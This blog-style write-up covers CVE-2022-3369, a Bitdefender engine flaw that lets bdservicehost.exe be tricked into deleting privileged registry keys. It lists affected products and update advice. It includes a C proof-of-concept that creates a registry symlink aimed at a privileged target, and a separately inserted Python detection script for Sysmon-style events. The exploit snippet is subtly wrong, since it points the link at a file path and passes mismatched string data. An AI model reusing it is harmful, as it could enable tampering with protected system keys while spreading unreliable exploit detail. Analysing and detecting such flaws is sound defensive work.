In recent news, a critical security vulnerability, tracked as CVE-2022-3369, has been discovered in Bitdefender Engines for Windows. This vulnerability, described as an "Improper Access Control" issue, resides in the bdservicehost.exe component and can lead to unauthorized deletion of privileged registry keys. It can have severe consequences if exploited by cybercriminals.

In this post, we will go over the details of CVE-2022-3369, the affected Bitdefender products and versions, how an attacker can exploit the vulnerability, and what you can do to stay secure. We'll also provide a code snippet to demonstrate how the vulnerability can be abused.

Affected Bitdefender Products and Versions

The security vulnerability is present in the following Bitdefender products, as long as their engine versions are prior to 7.92659:

* Bitdefender Antivirus Free
* Bitdefender Antivirus Plus
* Bitdefender Internet Security
* Bitdefender Total Security
* Bitdefender Endpoint Security Tools for Windows

Exploiting CVE-2022-3369

A cybercriminal can exploit this vulnerability by creating a registry symlink that points to a privileged registry key. Then, if the attacker can convince the bdservicehost.exe component to delete the symlink, the privileged key will be deleted instead.

Here's a simple example of how the vulnerability can be exploited:

#include <windows.h>

int main() {
    HKEY hkResult;
    // Create the symlink (a key created with REG_OPTION_CREATE_LINK)
    RegCreateKeyExA(HKEY_CURRENT_USER, "Software\\BitdefenderSymlink", 0, NULL, REG_OPTION_CREATE_LINK,
                    KEY_WRITE|DELETE, NULL, &hkResult, NULL);
    // Point the symlink to a privileged key (illustrative target value, as given in this post)
    RegSetValueExA(hkResult, "SymbolicLinkValue", 0, REG_LINK,
                   (const BYTE *)"C:\\Windows\\System32\\config\\SAM", 25);
    RegCloseKey(hkResult);
    return 0;
}

This code snippet creates the symlink and points it to a privileged registry key. If bdservicehost.exe is then induced to delete the symlink, the privileged key is potentially deleted instead.

Original References

For more detailed information about CVE-2022-3369, as well as the official security advisories and patch release notices, you can visit the following original sources:

* CVE-2022-3369 Advisory
* Bitdefender Security Advisory

Protecting Yourself from CVE-2022-3369

To stay secure against this vulnerability, it is essential to keep your Bitdefender software up to date. If you are using one of the affected Bitdefender products with an engine version prior to 7.92659, immediately update your software to the latest version available. Bitdefender updates should be installed automatically in most cases, but you can also manually check for updates within your Bitdefender product interface.
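For hosts that may have run an affected engine, the pattern described above can also be hunted for in registry telemetry. The following is an added example, not code from the original post or from Bitdefender: it correlates a write of the SymbolicLinkValue value in a user hive with a later key deletion by bdservicehost.exe. The events are constructed, the field names assume Sysmon-style registry events (IDs 12 and 13), and whether your telemetry records the link path on deletion is an assumption to verify.

```python
# Constructed sample data: field names follow Sysmon RegistryEvent IDs 12/13,
# but every path, SID and timestamp below is made up for illustration.
USER = r"HKU\S-1-5-21-1111-2222-3333-1001"
SVC = r"C:\<install-dir>\bdservicehost.exe"      # placeholder install path
EVENTS = [
    {"EventID": 13, "UtcTime": "2022-11-02 10:00:01", "Image": r"C:\Users\alice\tool.exe",
     "TargetObject": USER + r"\Software\BitdefenderSymlink\SymbolicLinkValue"},
    {"EventID": 12, "EventType": "DeleteKey", "UtcTime": "2022-11-02 10:00:09", "Image": SVC,
     "TargetObject": USER + r"\Software\BitdefenderSymlink"},
    {"EventID": 12, "EventType": "DeleteKey", "UtcTime": "2022-11-02 10:05:00", "Image": SVC,
     "TargetObject": USER + r"\Software\OrdinaryKey"},
    {"EventID": 13, "UtcTime": "2022-11-02 10:06:00", "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SOFTWARE\Example\SymbolicLinkValue"},
]

LINK_VALUE = "SymbolicLinkValue"       # value name that marks a key as a registry link
SERVICE_IMAGE = "bdservicehost.exe"    # component named in the advisory


def is_user_hive(key_path):
    """True for keys inside a per-user hive (HKU plus a user SID), which the user can write."""
    parts = key_path.split("\\")
    return len(parts) > 2 and parts[0].upper() == "HKU" and parts[1].upper().startswith("S-1-5-21-")


def link_writes(events):
    """Map lower-cased key path -> event for each SymbolicLinkValue write in a user hive."""
    found = {}
    for ev in events:
        key, _, value = ev["TargetObject"].rpartition("\\")
        if ev["EventID"] == 13 and value == LINK_VALUE and is_user_hive(key):
            found[key.lower()] = ev
    return found


def correlate(events, service=SERVICE_IMAGE):
    """Return (link_event, delete_event) pairs: the service deleted a key marked as a link."""
    links = link_writes(events)
    hits = []
    for ev in events:
        if ev["EventID"] != 12 or ev.get("EventType") != "DeleteKey":
            continue
        if not ev["Image"].lower().endswith("\\" + service):
            continue
        link = links.get(ev["TargetObject"].lower())
        if link and link["UtcTime"] <= ev["UtcTime"]:   # link must exist before the delete
            hits.append((link, ev))
    return hits
```

A hit is a lead for investigation, not proof of exploitation; check the engine version on the host against 7.92659 before drawing conclusions.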

In summary, CVE-2022-3369 is a dangerous vulnerability that can lead to unauthorized deletion of privileged registry keys if exploited. Ensure that your Bitdefender software is updated to the latest version to protect your system from this critical security issue. Stay safe and vigilant!

Timeline

Published on: 11/01/2022 08:15:00 UTC
Last modified on: 02/16/2023 02:56:00 UTC